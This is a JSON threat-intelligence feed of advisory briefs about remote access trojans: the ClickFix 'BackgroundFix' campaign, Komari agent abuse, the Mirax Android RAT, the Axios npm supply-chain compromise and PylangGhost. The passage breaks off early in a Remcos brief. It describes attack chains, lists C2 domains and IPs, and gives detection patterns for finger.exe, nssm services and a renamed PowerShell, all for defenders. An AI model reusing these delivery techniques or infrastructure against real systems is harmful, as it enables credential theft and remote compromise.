{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/rat/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Windows","Microsoft 365","Google Workspace"],"_cs_severities":["high"],"_cs_tags":["clickfix","malware","social-engineering","rat","infostealer","castleloader","netsupport"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThe BackgroundFix campaign is a social engineering scheme using fake \u0026ldquo;remove your photo background\u0026rdquo; services to deliver malware. Victims are lured to malicious sites mimicking legitimate image editing tools. The sites feature fake upload interfaces, progress bars, and download buttons to appear authentic. This campaign delivers a multi-stage payload, starting with CastleLoader. CastleLoader then drops NetSupport RAT, enabling remote access for the attackers, and CastleStealer, a custom .NET stealer designed to exfiltrate browser credentials, wallet extension data, and Telegram session files. 
This campaign appears to be active, with multiple domains sharing the same template.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eVictim searches for an online background removal tool and lands on a malicious BackgroundFix site.\u003c/li\u003e\n\u003cli\u003eThe victim uploads an image to the fake website.\u003c/li\u003e\n\u003cli\u003eAfter clicking a checkbox, the site instructs the victim to copy a command to the clipboard and then paste and run it (the ClickFix pattern).\u003c/li\u003e\n\u003cli\u003eThe copied command executes \u003ccode\u003efinger.exe\u003c/code\u003e, the built-in Windows client for the finger protocol (TCP/79), to query \u003ccode\u003echeeshomireciple[.]com\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003efinger.exe\u003c/code\u003e retrieves a batch script from the C2 server in the finger response.\u003c/li\u003e\n\u003cli\u003eThe batch script executes commands to download and execute further payloads.\u003c/li\u003e\n\u003cli\u003eCastleLoader is deployed, subsequently dropping NetSupport RAT and CastleStealer.\u003c/li\u003e\n\u003cli\u003eNetSupport RAT grants the attacker remote access, while CastleStealer exfiltrates sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful attacks result in the installation of NetSupport RAT, granting attackers remote control over the compromised system. Additionally, CastleStealer exfiltrates sensitive information such as browser credentials, wallet extension data, and Telegram session files. This stolen data can be used for further malicious activities, including financial fraud, identity theft, and unauthorized access to sensitive accounts. 
The active nature of the campaign and the use of multiple domains suggest a broad targeting scope.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for the execution of \u003ccode\u003efinger.exe\u003c/code\u003e with command-line arguments pointing to external domains (IOC: \u003ccode\u003echeeshomireciple[.]com\u003c/code\u003e). \u003ccode\u003efinger.exe\u003c/code\u003e is a signed Microsoft binary that is almost never used in enterprise environments, so any execution with a \u003ccode\u003euser@host\u003c/code\u003e argument is a high-fidelity alert, and blocking outbound TCP/79 at the perimeter removes this delivery step entirely.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect the execution of \u003ccode\u003efinger.exe\u003c/code\u003e to identify potential initial access attempts.\u003c/li\u003e\n\u003cli\u003eBlock the C2 domain \u003ccode\u003echeeshomireciple[.]com\u003c/code\u003e at the DNS resolver to prevent initial payload delivery.\u003c/li\u003e\n\u003cli\u003eMonitor network connections for NetSupport RAT C2 communications on port 688 to detect compromised systems (IOCs: \u003ccode\u003eporonto[.]com:688\u003c/code\u003e, \u003ccode\u003egiovettiadv[.]com:688\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T13:00:00Z","date_published":"2026-04-30T13:00:00Z","id":"/briefs/2026-04-clickfix-backgroundfix/","summary":"The 'BackgroundFix' ClickFix campaign uses social engineering to trick victims into downloading malware disguised as a free image-editing tool, leading to the deployment of CastleLoader, NetSupport RAT for remote access, and CastleStealer for credential theft.","title":"ClickFix 'BackgroundFix' Campaign Delivers CastleLoader, NetSupport RAT, and CastleStealer","url":"https://feed.craftedsignal.io/briefs/2026-04-clickfix-backgroundfix/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender","FortiGate","komari-agent"],"_cs_severities":["high"],"_cs_tags":["komari","backdoor","nssm","github","rat","reverse shell"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Fortinet","GitHub"],"content_html":"\u003cp\u003eHuntress discovered threat actors leveraging the Komari monitoring 
agent as a SYSTEM-level backdoor within a partner environment. Komari, a Go-based project on GitHub with over 4,000 stars, is designed as a remote-control and monitoring tool. This is a publicly documented case of Komari being abused in a real-world intrusion. The attackers compromised VPN credentials to gain initial access before deploying the Komari agent as a persistent backdoor. Komari is, by design, a command-and-control (C2) channel: remote command execution and interactive terminal access are enabled by default, so the unmodified tool was sufficient for the attacker. The threat actor installed Komari as a Windows service named \u0026ldquo;Windows Update Service\u0026rdquo; using NSSM, downloading the agent directly from the official GitHub repository, which avoided the need for attacker-controlled staging infrastructure. The initial discovery occurred on April 16, 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e The attacker establishes an SSLVPN session on a FortiGate device from IP address 45.153.34[.]132, authenticating as a legitimate user, [User 1].\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eInternal Reconnaissance:\u003c/strong\u003e After establishing the VPN connection, the attacker\u0026rsquo;s workstation, identified as VM8514, begins enumerating the internal network from the tunnel IP 10.212.134[.]200.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement:\u003c/strong\u003e Using Impacket\u0026rsquo;s smbexec.py, the attacker enables Remote Desktop Protocol (RDP) on the target workstation, [REDACTED-WRKSTN].\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRDP Access:\u003c/strong\u003e The attacker establishes an interactive RDP session to [REDACTED-WRKSTN].\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePersistence - Service Creation:\u003c/strong\u003e The attacker uses the Non-Sucking Service Manager (NSSM) to install the Komari agent as a persistent Windows service named \u0026ldquo;Windows Update 
Service\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAgent Download:\u003c/strong\u003e The Komari agent is downloaded from raw.githubusercontent[.]com/komari-monitor/komari-agent using a PowerShell one-liner executed directly on the system.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCommand and Control:\u003c/strong\u003e The Komari agent establishes a persistent WebSocket connection to its server, allowing the attacker to execute arbitrary commands (PowerShell/sh) and initiate interactive PTY reverse shell sessions.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMaintain Access \u0026amp; Execute:\u003c/strong\u003e The attacker maintains SYSTEM-level access via the persistent Komari agent, enabling ongoing remote command execution and control over the compromised workstation.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis attack demonstrates how readily available monitoring tools can be weaponized for malicious purposes. A single compromised account led to the establishment of a SYSTEM-level backdoor on a critical workstation. This could result in data exfiltration, further lateral movement within the network, and potentially ransomware deployment. Microsoft Defender quarantined an earlier registry hive dumping attempt, preventing further data compromise. 
The number of affected organizations is currently unknown. Because the attacker brings the agent along and installs it straight from the public repository, organizations are exposed whether or not they use Komari legitimately; the controllable points are the VPN credential and the unmonitored service installation.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor FortiGate logs for SSLVPN sessions originating from suspicious IP addresses (45.153.34[.]132) and unusual ASNs (ASN 51396) to detect potentially compromised credentials.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u0026ldquo;Detect Komari Agent Installation via PowerShell\u0026rdquo; to identify installations of the Komari agent.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for the execution of \u003ccode\u003enssm.exe\u003c/code\u003e installing a service named \u0026ldquo;Windows Update Service\u0026rdquo;. No built-in Windows service carries that name (the real one is \u0026ldquo;Windows Update\u0026rdquo;, \u003ccode\u003ewuauserv\u003c/code\u003e), and the System event log records the same installation as event ID 7045 with \u003ccode\u003enssm.exe\u003c/code\u003e as the service file name, which covers hosts that have no process-creation sensor.\u003c/li\u003e\n\u003cli\u003eBlocking raw.githubusercontent[.]com outright at the DNS resolver or web proxy stops this download path, but it also breaks legitimate developer and package-manager traffic; apply the block where that is acceptable (servers, non-developer workstations) and elsewhere alert on downloads from it by SYSTEM, by service accounts, or by hosts with no development role.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T00:00:00Z","date_published":"2026-04-30T00:00:00Z","id":"/briefs/2026-04-komari-red/","summary":"Threat actors are abusing the Komari monitoring agent, a project hosted on GitHub, as a SYSTEM-level backdoor following initial access through compromised VPN credentials and lateral movement via Impacket.","title":"Komari Agent Abused as SYSTEM-Level Backdoor","url":"https://feed.craftedsignal.io/briefs/2026-04-komari-red/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["android","rat","mirax","malware-as-a-service","proxy"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe Mirax RAT is a newly identified Android Remote Access Trojan (RAT) that has been actively targeting users in Europe since March 2026. 
It is offered as Malware-as-a-Service (MaaS) to a small group of affiliates, primarily Russian-speaking actors, through tiered subscription models. Since December 2025, Mirax has been promoted on underground forums and used in multiple campaigns. The RAT\u0026rsquo;s distribution relies on malicious advertisements on Meta platforms like Facebook, Instagram, and Messenger, with over 200,000 users potentially exposed to these ads. The malware uses dropper pages hosted on GitHub and relies on APK sideloading for execution, bypassing the Google Play Store\u0026rsquo;s security measures. Mirax\u0026rsquo;s capabilities extend beyond typical RAT functions, including turning infected devices into residential proxy nodes via a SOCKS5 proxy.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker creates malicious ads on Facebook, Instagram, and Messenger promoting IPTV application services.\u003c/li\u003e\n\u003cli\u003eUsers click on the advertisements, which redirect them to dropper pages hosted on GitHub.\u003c/li\u003e\n\u003cli\u003eThe user is prompted to enable installation from unknown sources on their Android device.\u003c/li\u003e\n\u003cli\u003eThe malicious IPTV application is installed via APK sideloading.\u003c/li\u003e\n\u003cli\u003eThe application initiates a multi-stage infection process, utilizing Golden Encryption (Golden Crypt) to pack the payload.\u003c/li\u003e\n\u003cli\u003eThe payload, an encrypted Dalvik Executable (.dex) file, is decrypted at runtime by the packer stub (Android executes no app code during installation) using the RC4 stream cipher with a hardcoded key, and is then loaded.\u003c/li\u003e\n\u003cli\u003eMirax gains control of the device, enabling overlay and notification injection for credential theft.\u003c/li\u003e\n\u003cli\u003eAttackers can view the screen in real-time, navigate and control the device, manage applications, exfiltrate images and text, and launch a SOCKS5 proxy connection to proxy traffic through the infected 
device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe Mirax RAT campaign has the potential to affect a large number of Android users in Europe. The malicious advertisements have already reached over 200,000 users. Successful infections can lead to credential theft, financial fraud, data exfiltration, and the compromised device being used as a residential proxy, potentially masking malicious activity and further expanding the attacker\u0026rsquo;s reach. Banks and financial institutions are specifically highlighted as high-value targets.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor network traffic for connections to GitHub domains that serve APK downloads (for example responses with the \u003ccode\u003eapplication/vnd.android.package-archive\u003c/code\u003e content type), and correlate that with Android device user agents (Network Connection and User Agent logs).\u003c/li\u003e\n\u003cli\u003eWhere your MDM or mobile threat defense product reports the installer of each app, alert on packages installed by anything other than the Google Play Store, which is what a sideloaded APK looks like; Android devices do not feed conventional process creation logs into an enterprise SIEM, so this is the practical equivalent of parent-child process monitoring (Process Creation Logs).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule provided below to detect the execution of applications from untrusted sources and tune for your environment.\u003c/li\u003e\n\u003cli\u003eMonitor network connections for SOCKS5 proxy traffic originating from Android devices, which may indicate compromised devices acting as residential proxies (Network Connection Logs); a proxy node behind NAT connects outbound to the operator\u0026rsquo;s relay, so look for long-lived sessions with balanced upload and download volume rather than for listening ports.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-16T12:00:00Z","date_published":"2026-04-16T12:00:00Z","id":"/briefs/2026-04-mirax-rat/","summary":"Mirax RAT, a new Android RAT distributed as MaaS, is targeting European users by turning infected devices into residential proxy nodes and enabling credential theft via overlay and notification injection.","title":"Mirax RAT Targeting Android Users in 
Europe","url":"https://feed.craftedsignal.io/briefs/2026-04-mirax-rat/"},{"_cs_actors":["UNC1069"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply chain attack","npm","social engineering","rat","unc1069"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn April 4, 2026, the maintainers of the Axios HTTP client disclosed a social engineering attack targeting one of their developers. The attack, attributed to the North Korean threat actor UNC1069, involved impersonating a legitimate company to build trust with the targeted developer. The attacker used a fake Microsoft Teams update disguised as a critical error fix to deploy a remote access trojan (RAT). This RAT allowed the attackers to gain access to the developer\u0026rsquo;s system and npm credentials. The attackers then published two malicious versions of Axios (1.14.1 and 0.30.4) to the npm package registry. These malicious versions included a dependency called plain-crypto-js, which installed a RAT on macOS, Windows, and Linux systems. 
These versions were available for three hours, posing a supply chain risk to any systems that installed them during that period.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a target developer and initiates contact via LinkedIn/Slack, impersonating a legitimate company.\u003c/li\u003e\n\u003cli\u003eThe attacker invites the developer to a Slack workspace populated with fake profiles and staged company activity.\u003c/li\u003e\n\u003cli\u003eA meeting is scheduled on Microsoft Teams, during which a fake \u0026ldquo;RTC Connection\u0026rdquo; error message is displayed.\u003c/li\u003e\n\u003cli\u003eThe attacker prompts the developer to install a \u0026ldquo;Teams update\u0026rdquo; to resolve the error.\u003c/li\u003e\n\u003cli\u003eThe fake update is a RAT, granting the attacker remote access to the developer\u0026rsquo;s machine.\u003c/li\u003e\n\u003cli\u003eThe attacker steals the developer\u0026rsquo;s npm credentials, bypassing MFA by reusing the developer\u0026rsquo;s already-authenticated npm session instead of logging in afresh.\u003c/li\u003e\n\u003cli\u003eThe attacker publishes malicious versions of the Axios package (1.14.1 and 0.30.4) to the npm registry, injecting the plain-crypto-js dependency.\u003c/li\u003e\n\u003cli\u003eSystems installing the compromised Axios versions download and execute the plain-crypto-js package, resulting in RAT deployment and credential theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the Axios npm package created a supply chain attack impacting an unknown number of systems across various sectors. Systems that installed the malicious versions (1.14.1 and 0.30.4) within the three-hour window are considered compromised. Successful exploitation results in the installation of a remote access trojan (RAT) capable of stealing credentials, browser data, and other sensitive information from macOS, Windows, and Linux systems. 
This can lead to further unauthorized access, data breaches, and potential financial loss.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eCheck lockfiles and installed trees for the plain-crypto-js dependency (\u003ccode\u003enpm ls plain-crypto-js\u003c/code\u003e, or a search of \u003ccode\u003epackage-lock.json\u003c/code\u003e), particularly in projects that resolved Axios 1.14.1 or 0.30.4; a legitimate project has no reason to depend on it, so its presence anywhere in the tree is an indicator. Where build pipelines allow it, install with \u003ccode\u003e--ignore-scripts\u003c/code\u003e so a rogue dependency cannot execute at install time.\u003c/li\u003e\n\u003cli\u003eImplement multi-factor authentication (MFA) for npm accounts and other developer accounts, but recognize that authenticated sessions can be hijacked and that a stolen publish token is used without a second factor; prefer short-lived, scoped publish tokens and require 2FA for publishing on the package itself.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious NPM Package Installation\u0026rdquo; to detect potentially malicious package installations based on unusual parent processes (see below).\u003c/li\u003e\n\u003cli\u003eBlock the attacker infrastructure contacted by plain-crypto-js at the DNS resolver and network perimeter (the IP and domain IOCs are listed in the companion Axios brief on this feed); the second-stage payloads are fetched from that infrastructure rather than from the npm registry, so registry allow-listing alone does not stop them.\u003c/li\u003e\n\u003cli\u003eEducate developers about social engineering tactics and the risks of installing software from untrusted sources.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-04T20:30:42Z","date_published":"2026-04-04T20:30:42Z","id":"/briefs/2026-04-axios-npm-hack/","summary":"North Korean threat actors (UNC1069) compromised the Axios npm package by socially engineering a maintainer with a fake Microsoft Teams update delivering a RAT, leading to the injection of a malicious dependency and a supply chain attack.","title":"Axios npm Package Compromised via Social Engineering","url":"https://feed.craftedsignal.io/briefs/2026-04-axios-npm-hack/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","npm","javascript","rat"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 31, 2026, the official Axios node package manager (npm) package was compromised in a supply chain attack. The attack resulted in the deployment of two malicious versions, v1.14.1 and v0.30.4. 
Axios is a widely used JavaScript library for making HTTP requests, with approximately 100 million downloads per week. The malicious packages were available for around three hours. The compromised packages introduced a fake runtime dependency, \u0026lsquo;plain-crypto-js\u0026rsquo;, that executes automatically after installation. This dependency then communicates with attacker-controlled infrastructure at 142.11.206.73, pulling down platform-specific payloads for Linux, macOS, and Windows. The payloads are remote access trojans (RATs), enabling the attackers to gather information and execute additional malicious activities.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromised the Axios NPM package and injected malicious code.\u003c/li\u003e\n\u003cli\u003eMalicious versions v1.14.1 and v0.30.4 were published to the NPM registry.\u003c/li\u003e\n\u003cli\u003eThe malicious packages introduce a fake runtime dependency named \u0026lsquo;plain-crypto-js\u0026rsquo;.\u003c/li\u003e\n\u003cli\u003eUpon installation of the compromised package, the \u0026lsquo;plain-crypto-js\u0026rsquo; dependency executes automatically via a post-install script.\u003c/li\u003e\n\u003cli\u003eThe dependency connects to the attacker-controlled IP address 142.11.206.73 to retrieve a platform-specific payload.\u003c/li\u003e\n\u003cli\u003eOn macOS, a binary named \u0026ldquo;com.apple.act.mond\u0026rdquo; is downloaded and executed using zsh.\u003c/li\u003e\n\u003cli\u003eOn Windows, a PowerShell script (6202033.ps1) is downloaded, the legitimate powershell.exe is copied to \u0026ldquo;%PROGRAMDATA%\\wt.exe\u0026rdquo; (a renamed copy that sidesteps detections keyed on the powershell.exe image name), and the script is executed through that copy with the window-hidden and execution-policy-bypass flags.\u003c/li\u003e\n\u003cli\u003eOn Linux, a Python backdoor is downloaded and executed. 
The downloaded executables act as Remote Access Trojans (RATs) exfiltrating credentials and enabling remote management.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack could lead to significant compromise across numerous organizations using the Axios library. The actors exfiltrate credentials and gain remote management capabilities. All credentials present on systems that installed the malicious package should be considered compromised and immediately rotated. The widespread use of Axios means the impact could extend to many applications and systems, potentially enabling further attacks leveraging compromised credentials. Supply chain attacks on widely used libraries are a recurring pattern rather than an outlier: the Cisco Talos 2025 Year in Review attributes 25% of its top 100 vulnerabilities to them.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRoll back or pin to the safe Axios versions (v1.14.0 or v0.30.3) immediately; a rollback alone does not clean a host on which the post-install script has already run.\u003c/li\u003e\n\u003cli\u003eInvestigate systems that installed the malicious versions (v1.14.1 or v0.30.4) for follow-on payloads from the actor-controlled infrastructure, and rotate every credential that was present on them.\u003c/li\u003e\n\u003cli\u003eBlock the actor-controlled IP address 142.11.206.73 and domain Sfrclak.com at the network perimeter to prevent further communication with the malicious infrastructure.\u003c/li\u003e\n\u003cli\u003eMonitor for PowerShell running from unusual locations, specifically \u0026ldquo;%PROGRAMDATA%\\wt.exe\u0026rdquo;. Because the binary is renamed, match on PE metadata rather than on the image name: Sysmon process-creation events carry \u003ccode\u003eOriginalFileName: PowerShell.EXE\u003c/code\u003e, a field that Windows Security event 4688 does not expose.\u003c/li\u003e\n\u003cli\u003eImplement a process creation rule that alerts when processes with uncommon parents (for example \u003ccode\u003enode.exe\u003c/code\u003e spawning a script interpreter) connect to external IPs. 
See example rule below.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-04T12:00:00Z","date_published":"2026-04-04T12:00:00Z","id":"/briefs/2026-04-axios-npm-supply-chain/","summary":"A supply chain attack on the Axios NPM package injected malicious code into versions v1.14.1 and v0.30.4, leading to the deployment of platform-specific remote access trojans (RATs) after the installation of a rogue dependency that communicated with attacker-controlled infrastructure to retrieve malicious payloads for Windows, macOS, and Linux.","title":"Axios NPM Supply Chain Attack Delivering Platform-Specific RATs","url":"https://feed.craftedsignal.io/briefs/2026-04-axios-npm-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","npm","rat","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 31, 2026, a supply chain attack targeted the \u003ccode\u003eaxios\u003c/code\u003e npm package, a widely used HTTP client library for JavaScript. Compromised versions 1.14.1 and 0.30.4 of the library were injected with malicious code that installed a cross-platform Remote Access Trojan (RAT) on any system that resolved them. This brief covers the exposure of \u003ccode\u003e@usebruno/cli\u003c/code\u003e, which depends on \u003ccode\u003eaxios\u003c/code\u003e: users who performed an \u003ccode\u003enpm install\u003c/code\u003e within the roughly 3-hour window between 00:21 UTC and 03:30 UTC received the malicious version. The malicious code was designed to execute during the \u003ccode\u003epostinstall\u003c/code\u003e phase of the package installation, so it runs on developer workstations and CI runners at install time, before any application code is invoked. 
This incident highlights the increasing risk of supply chain attacks targeting open-source software and the importance of verifying the integrity of third-party dependencies.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker compromises the \u003ccode\u003eaxios\u003c/code\u003e npm package, injecting malicious code into versions 1.14.1 and 0.30.4.\u003c/li\u003e\n\u003cli\u003eThe compromised \u003ccode\u003eaxios\u003c/code\u003e package is published to the npm registry.\u003c/li\u003e\n\u003cli\u003eA user of \u003ccode\u003e@usebruno/cli\u003c/code\u003e executes \u003ccode\u003enpm install\u003c/code\u003e within the attack window (00:21 UTC - 03:30 UTC on March 31, 2026).\u003c/li\u003e\n\u003cli\u003eThe npm package manager resolves the dependency chain and downloads the compromised \u003ccode\u003eaxios\u003c/code\u003e package, together with the hidden dependency it declares, as a dependency of \u003ccode\u003e@usebruno/cli\u003c/code\u003e. An intact lockfile pinning \u003ccode\u003eaxios\u003c/code\u003e to a clean release, installed with \u003ccode\u003enpm ci\u003c/code\u003e, would not have resolved the new version.\u003c/li\u003e\n\u003cli\u003eThe hidden dependency\u0026rsquo;s \u003ccode\u003epostinstall\u003c/code\u003e script executes during the installation process.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003epostinstall\u003c/code\u003e script downloads and installs a cross-platform Remote Access Trojan (RAT) on the user\u0026rsquo;s system.\u003c/li\u003e\n\u003cli\u003eThe RAT establishes a connection to a remote command-and-control (C2) server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the RAT to exfiltrate credentials and other sensitive data from the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack could have resulted in widespread compromise of developer systems that used the \u003ccode\u003e@usebruno/cli\u003c/code\u003e. 
While the number of affected users is unknown, the incident could have led to the exfiltration of sensitive credentials and proprietary source code, potentially enabling further attacks against the affected organizations and their customers. The incident underscores the need for robust security measures in software development pipelines and continuous monitoring of third-party dependencies for malicious activity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eIf \u003ccode\u003e@usebruno/cli\u003c/code\u003e was installed during the affected window, treat the host as compromised: reinstalling dependencies restores a clean \u003ccode\u003eaxios\u003c/code\u003e but does not remove a RAT that already ran during \u003ccode\u003epostinstall\u003c/code\u003e, so investigate or rebuild the host before trusting it again.\u003c/li\u003e\n\u003cli\u003eRotate all credentials and secrets that were present on systems where \u003ccode\u003e@usebruno/cli\u003c/code\u003e was installed during the affected window.\u003c/li\u003e\n\u003cli\u003eReview and implement the security guidance provided in the Aikido Security blog post to further harden your systems (reference: \u003ca href=\"https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat\"\u003ehttps://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for unusual processes spawned by npm or node processes, using the provided Sigma rule (reference: Sigma rule - \u0026ldquo;Detect Suspicious Process Spawned by NPM\u0026rdquo;).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T12:00:00Z","date_published":"2026-04-03T12:00:00Z","id":"/briefs/2026-04-axios-supply-chain/","summary":"Compromised versions of the `axios` npm package introduced a hidden dependency deploying a cross-platform Remote Access Trojan (RAT), impacting users of `@usebruno/cli` who ran `npm install` between 00:21 UTC and ~03:30 UTC on March 31, 2026, potentially leading to credential 
exfiltration.","title":"Compromised Axios Library Leads to RAT Deployment via @usebruno/cli","url":"https://feed.craftedsignal.io/briefs/2026-04-axios-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","rat","npm","pylangghost"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA new remote access trojan (RAT) named PylangGhost has been discovered on the npm registry. This marks the first known instance of this specific RAT being distributed via a software supply chain attack on the npm ecosystem. The RAT is written in Python, which its name reflects; the npm packages only carry and launch it. The affected npm packages are designed to inject malicious code into projects that depend on them. This malicious code facilitates unauthorized remote access to infected systems, thereby providing threat actors with the ability to exfiltrate sensitive data, deploy further malware, or perform other malicious activities. 
This is a supply chain attack that endangers developers and applications.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA developer installs a malicious package from the npm registry containing PylangGhost.\u003c/li\u003e\n\u003cli\u003eDuring the installation process, a post-install script or similar mechanism executes, injecting the PylangGhost RAT into the developer\u0026rsquo;s environment.\u003c/li\u003e\n\u003cli\u003eThe RAT establishes a connection to a command-and-control (C2) server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe C2 server sends commands to the infected system, instructing the RAT to perform specific actions.\u003c/li\u003e\n\u003cli\u003eThe RAT executes the commands, potentially including data exfiltration, downloading and executing additional payloads, or establishing persistence.\u003c/li\u003e\n\u003cli\u003eSensitive data, such as credentials, API keys, or source code, is exfiltrated from the compromised system to the C2 server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote access and control over the compromised system, enabling further malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe presence of PylangGhost on the npm registry introduces a significant supply chain risk.  Successful infection allows attackers to gain remote access to developer systems, potentially leading to the theft of sensitive source code, credentials, and other proprietary information. The compromise can extend to applications built using the infected packages, impacting downstream users and potentially leading to widespread data breaches or service disruptions. 
The number of affected victims is currently unknown, but the risk is widespread due to the popularity of the npm registry.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor npm package installations for suspicious post-install scripts or unexpected network connections (see related Sigma rules).\u003c/li\u003e\n\u003cli\u003eImplement strong dependency scanning tools to identify and remove potentially malicious packages from your projects.\u003c/li\u003e\n\u003cli\u003eAnalyze network connection logs for connections to unusual or malicious domains after npm package installations (see related Sigma rules).\u003c/li\u003e\n\u003cli\u003eEnable process monitoring for any processes spawned during or after npm package installations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-16T04:45:53Z","date_published":"2026-03-16T04:45:53Z","id":"/briefs/2024-01-pylangghost-npm/","summary":"A new remote access trojan (RAT) named PylangGhost has been observed on the npm registry, posing a supply chain risk to developers and applications using affected packages.","title":"PylangGhost RAT Observed on npm Registry","url":"https://feed.craftedsignal.io/briefs/2024-01-pylangghost-npm/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["remcos","rat","fileless","phishing"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis threat brief discusses a Remcos RAT infection chain that utilizes a fileless, multi-stage approach. While specific details regarding the initial phishing lure, exploitation method, and Remcos RAT version are absent from the original report, the core focus is on the fileless execution and memory residency of the RAT. The attack begins with an unspecified phishing attack and culminates in a Remcos RAT running entirely in memory, hindering traditional disk-based forensic analysis. 
